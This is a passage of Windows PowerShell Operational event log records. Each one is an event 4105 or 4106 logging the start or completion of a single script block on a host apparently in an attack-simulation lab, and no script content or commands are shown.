06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473800
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473799
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473798
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473797
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473796
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473795
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473794
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473793
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473792
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473791
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473790
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473789
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473788
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473787
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473786
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473785
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473784
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473783
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473782
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473781
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473780
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473779
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473778
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473777
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473776
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473775
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473774
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473773
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473772
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473771
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473770
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473769
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473768
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473767
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473766
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473765
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473764
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473763
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473762
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473761
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473760
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473759
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473758
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473757
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473756
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473755
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473754
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473753
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473752
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473751
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473750
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473749
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473748
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473747
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473746
Keywords=None
